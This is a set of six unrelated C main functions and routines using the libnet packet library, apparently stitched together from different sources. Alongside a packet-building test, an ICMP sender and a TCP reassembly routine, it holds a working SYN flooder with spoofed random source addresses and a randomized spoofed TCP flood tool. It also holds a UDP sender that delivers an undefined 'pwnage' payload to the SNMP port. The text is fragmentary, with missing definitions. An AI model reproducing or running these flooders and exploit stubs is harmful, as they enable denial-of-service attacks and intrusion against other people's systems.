int main(int argc, char **argv) { int sock, c; u_long src_ip, dst_ip; u_short src_prt, dst_prt; u_char *cp, *buf; u_char *payload = "hello world"; u_char *options = " This here is a 40-byte IP option list."; int payload_s = strlen(payload); int option_s = strlen(options); struct ipoption ipopt; src_ip = 0; dst_ip = 0; src_prt = 0; dst_prt = 0; printf("IP + options and TCP + payload packet building/writing test\n"); while((c = getopt(argc, argv, "d:s:")) != EOF) { switch (c) { /* * We expect the input to be of the form `ip.ip.ip.ip.port`. We * point cp to the last dot of the IP address/port string and * then seperate them with a NULL byte. The optarg now points to * just the IP address, and cp points to the port. */ case 'd': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; dst_prt = (u_short)atoi(cp); if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; case 's': if (!(cp = strrchr(optarg, '.'))) { usage(argv[0]); } *cp++ = 0; src_prt = (u_short)atoi(cp); if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(EXIT_FAILURE); } break; } } if (!src_ip || !src_prt || !dst_ip || !dst_prt) { usage(argv[0]); exit(EXIT_FAILURE); } /* * Get packet memory. Let's get plenty. */ buf = malloc(IP_MAXPACKET); if (!buf) { perror("No memory for packet"); exit(EXIT_FAILURE); } /* * Open our raw IP socket and set IP_HDRINCL. */ sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(EXIT_FAILURE); } /* * Build the IP header (shown exploded for commenting). */ libnet_build_ip(LIBNET_TCP_H + payload_s,/* Size of the payload */ 0, /* IP tos */ 242, /* IP ID */ 0, /* Frag stuff */ 48, /* TTL */ IPPROTO_TCP, /* Transport protocol */ src_ip, /* Source IP */ dst_ip, /* Destination IP */ NULL, /* Pointer to payload (none) */ 0, buf); /* Packet header memory */ /* * Build the TCP header. */ libnet_build_tcp(src_prt, /* Source TCP port */ dst_prt, /* Destination TCP port */ 11111, /* Sequence number */ 99999, /* Acknowledgement number */ TH_SYN|TH_ACK, /* Control flags */ 1024, /* Window size */ 0, /* Urgent pointer */ payload, /* Pointer to payload */ payload_s, buf + LIBNET_IP_H); /* Packet header memory */ /* * Calculate the TCP header checksum (IP header checksum is *always* done * by the kernel. */ libnet_do_checksum(buf, IPPROTO_TCP, LIBNET_TCP_H + payload_s); memcpy(ipopt.ipopt_list, options, option_s); *(ipopt.ipopt_list) = IPOPT_SECURITY; *(ipopt.ipopt_list + 1) = 1; /* * Insert the IP options. */ c = libnet_insert_ipo(&ipopt, /* pointer to ipopt struct */ option_s, /* Length of option list */ buf); /* Packet header memory */ if (c == -1) { fprintf(stderr, "Can't add options, discarding them.\n"); } /* * Write the packet to the network. */ c = libnet_write_ip(sock, buf, LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s); if (c < LIBNET_TCP_H + LIBNET_IP_H + payload_s + option_s) { fprintf(stderr, "libnet_write_ip: %s\n", strerror(errno)); } printf("Completed, wrote %d bytes\n", c); free(buf); return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS); }
int main(int argc, char **argv) { int sock, n, c, r, p_num; struct libnet_arena arena, *arena_p; u_char *packets[10]; u_char *payload; u_char *buf; u_long src_ip, dst_ip; src_ip = 0; dst_ip = 0; payload = NULL; while((c = getopt(argc, argv, "d:s:p:")) != EOF) { switch (c) { case 'd': if (!(dst_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad destination IP address: %s\n", optarg); exit(1); } break; case 's': if (!(src_ip = libnet_name_resolve(optarg, 1))) { fprintf(stderr, "Bad source IP address: %s\n", optarg); exit(-1); } break; case 'p': payload = optarg; break; default: usage(); exit(-1); } } if (!src_ip || !dst_ip || !payload) { usage(); exit(-1); } /* allocate packet memory */ buf = (u_char *)malloc(LIBNET_IP_H + LIBNET_ICMP_H + strlen(payload)); if(!buf) { perror("malloc:"); exit(-1); } sock = libnet_open_raw_sock(IPPROTO_RAW); if (sock == -1) { perror("No socket"); exit(-1); } /* build headers */ libnet_build_ip(LIBNET_ICMP_ECHO_H, IPTOS_LOWDELAY | IPTOS_THROUGHPUT, TPING_ID, 0, TPING_TTL, IPPROTO_ICMP, src_ip, dst_ip, NULL, 0, buf); libnet_build_icmp_echo(ICMP_ECHO, 0, TPING_ID, 1, payload,strlen(payload), buf + LIBNET_IP_H); if (libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) < 0) { fprintf(stderr, "Can't do checksum!\n"); } /* * Write the packet to the network. */ r = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload)); if (r < LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload)) { fprintf(stderr, "Unable to send packet.\n"); } printf("ICMP Echo sent. Payload: %s\n",payload); }
int main(int argc, char *argv[]) { u_long dest_ip; u_short dest_port; u_char errbuf[LIBNET_ERRBUF_SIZE], *packet; int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H; if(argc < 3) { printf("Usage:\n%s\t <target host> <target port>\n", argv[0]); exit(1); } dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // the host dest_port = (u_short) atoi(argv[2]); // the port network = libnet_open_raw_sock(IPPROTO_RAW); // open network interface if (network == -1) libnet_error(LIBNET_ERR_FATAL, "can't open network interface. -- this program must run as root.\n"); libnet_init_packet(packet_size, &packet); // allocate memory for packet if (packet == NULL) libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n"); libnet_seed_prand(); // seed the random number generator printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip)); while(1) // loop forever (until break by CTRL-C) { libnet_build_ip(LIBNET_TCP_H, // size of the packet sans IP header IPTOS_LOWDELAY, // IP tos libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 0, // frag stuff libnet_get_prand(LIBNET_PR8), // TTL (randomized) IPPROTO_TCP, // transport protocol libnet_get_prand(LIBNET_PRu32), // source IP (randomized) dest_ip, // destination IP NULL, // payload (none) 0, // payload length packet); // packet header memory libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) dest_port, // destination TCP port libnet_get_prand(LIBNET_PRu32), // sequence number (randomized) libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized) TH_SYN, // control flags (SYN flag set only) libnet_get_prand(LIBNET_PRu16), // window size (randomized) 0, // urgent pointer NULL, // payload (none) 0, // payload length packet + LIBNET_IP_H); // packet header memory if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1) libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n"); byte_count = libnet_write_ip(network, packet, packet_size); // inject packet if (byte_count < packet_size) libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written. (%d of %d bytes)", byte_count, packet_size); usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds } libnet_destroy_packet(&packet); // free packet memory if (libnet_close_raw_sock(network) == -1) // close the network interface libnet_error(LIBNET_ERR_WARNING, "can't close network interface."); return 0; }
struct iovec * tcp_raw_input(struct libnet_ip_hdr *ip, struct libnet_tcp_hdr *tcp, int len) { struct tha tha; struct tcp_conn *conn; struct tcp_seg seg; struct iovec *iov; u_short cksum; u_char *buf; int tcp_hl = tcp->th_off * 4; /* Verify TCP checksum. */ cksum = tcp->th_sum; libnet_do_checksum((u_char *) ip, IPPROTO_TCP, len); if (cksum != tcp->th_sum) return (NULL); tha.src = ip->ip_src.s_addr; tha.dst = ip->ip_dst.s_addr; tha.port = ntohs(tcp->th_sport) << 16 | ntohs(tcp->th_dport); buf = (u_char *)tcp + tcp_hl; len -= tcp_hl; iov = NULL; /* Find half-duplex stream associated with this segment. */ for (conn = &conntab[tha.port % TCP_HASHSIZE]; conn->next != NULL; conn = conn->next) { if (memcmp((char *)&tha, (char *)&conn->tha, sizeof(tha)) == 0) break; } /* Process by TCP flags. */ if (conn->next == NULL) { if (tcp->th_flags & TH_SYN) { if (conn->next == NULL && (conn->next = (struct tcp_conn *) calloc(1, sizeof(*conn))) == NULL) { err(1, "tcp_raw_input: calloc"); } conn->tha = tha; if (conn->seg == NULL && (conn->seg = (struct tcp_seg *) malloc(sizeof(seg) * 128)) == NULL) { err(1, "tcp_raw_input: malloc"); } conn->segmax = 128; } } else if (tcp->th_flags & TH_FIN || tcp->th_flags & TH_RST) { iov = tcp_raw_reassemble(conn, 1); } else if (tcp->th_flags & TH_ACK && len > 0) { seg.seq = ntohl(tcp->th_seq); if (bsearch(&seg, conn->seg, conn->segcnt, sizeof(seg), tcp_seg_compare) == NULL) { if ((seg.data = (u_char *) malloc(len)) == NULL) err(1, "tcp_raw_input: malloc"); memcpy(seg.data, buf, len); seg.len = len; if (conn->segcnt == conn->segmax) { if ((conn->seg = (struct tcp_seg *) realloc(conn->seg, (conn->segmax * 2) * sizeof(seg))) == NULL) err(1, "tcp_raw_input: realloc"); conn->segmax *= 2; } conn->seg[conn->segcnt++] = seg; iov = tcp_raw_reassemble(conn, Opt_snaplen); } } conn->mtime = time(NULL); /* If we successfully reassembled the stream, delete its entry. */ if (iov != NULL) { tcp_raw_delete(conn); } return (iov); }
int main (int argc, char *argv[]) { int i, loop; /* no payload yet */ int size = LIBNET_PACKET; opt.seqn = opt.ackn = opt.flags = 0; opt.dport = opt.sport = opt.frag = 0; opt.ttl = 255; opt.winsize = 16384; opt.tos = 0x08; signal (SIGINT, (void (*)()) abort); srand (time (NULL) + getpid ()); srandom (time (NULL) + getpid ()); banner (); parse_args (argc, argv); if (!whocares) { if (!local) { if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE))) { libnet_error (LIBNET_ERR_FATAL, ":: invalid destination IP address: %s\n", dsthost); exit (1); } printf (":: destination host - %s\n", dsthost); } else printf (":: destination host - local\n"); } else printf (":: destination host - whocares\n"); printf (":: destination port(s)"); for (i = 1; i < ports + 1; i++) printf (" - %d", portarray[i]); printf ("\n"); if (libnet_init_packet (size, &packet) == NULL) { libnet_error (LIBNET_ERR_FATAL, ":: libnet_init_packet failed\n"); } if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1) { libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n"); } printf (":: spanking...\n"); printf (":: press ^C to end...\n"); for (;;) { for (i = 1; i < ports + 1; i++) { if (whocares) change2 = random () & 01; if (ismult) { opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); if (local) opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5); else { if (change2) opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); else opt.dst = rand (); } } else { opt.src = rand (); if (local) opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5); else { if (change2) opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254); else opt.dst = rand (); } } if (isrand) { loop = rand () % 5; for (i = 0; i <= loop; i++) opt.flags |= flag_array[rand () % 5]; opt.frag = frag_array[rand () % 3]; opt.ackn = random (); opt.sport = 1024 + rand () % 32000; opt.tos = tos_array[rand () % 3]; opt.ttl = rand () % 255; opt.winsize = rand () % 32000; if (change) ismult = random () & 01; } opt.ident = random (); opt.seqn = random (); if (!stream) opt.ackn = random (); if (portarray[i] == 0) opt.dport = rand () % 1024; else opt.dport = portarray[i]; libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet); libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H); if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1) { libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n"); } libnet_write_ip (s, packet, size); } } return 1; }
int main(int argc, char **argv) { char errbuf[LIBNET_ERRBUF_SIZE]; libnet_t *l; int c; u_char *buf; int packet_len = 0; struct ip *IP; struct udphdr *UDP; u_int32_t src = 0, dst = 0; banner(); if (argc < 3) usage(argv[0]); if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) { fprintf(stderr, "[!] libnet_init() failed: %s", errbuf); exit(-1); } if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "[!] Unresolved source address.\n"); exit(-1); } if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) { fprintf(stderr, "[!] Unresolved destination address.\n"); exit(-1); } if ((buf = malloc(IP_MAXPACKET)) == NULL) { perror("malloc"); exit(-1); } UDP = (struct udphdr *)(buf + LIBNET_IPV4_H); packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1; srand(time(NULL)); IP = (struct ip *) buf; IP->ip_v = 4; /* version 4 */ IP->ip_hl = 5; /* header length */ IP->ip_tos = 0; /* IP tos */ IP->ip_len = htons(packet_len); /* total length */ IP->ip_id = rand(); /* IP ID */ IP->ip_off = htons(0); /* fragmentation flags */ IP->ip_ttl = 64; /* time to live */ IP->ip_p = IPPROTO_UDP; /* transport protocol */ IP->ip_sum = 0; IP->ip_src.s_addr = src; IP->ip_dst.s_addr = dst; UDP->uh_sport = rand(); UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161); UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1); UDP->uh_sum = 0; memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1); libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H); if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) { fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l)); exit(-1); } printf("[+] Packet sent.\n"); libnet_destroy(l); free(buf); return (0); }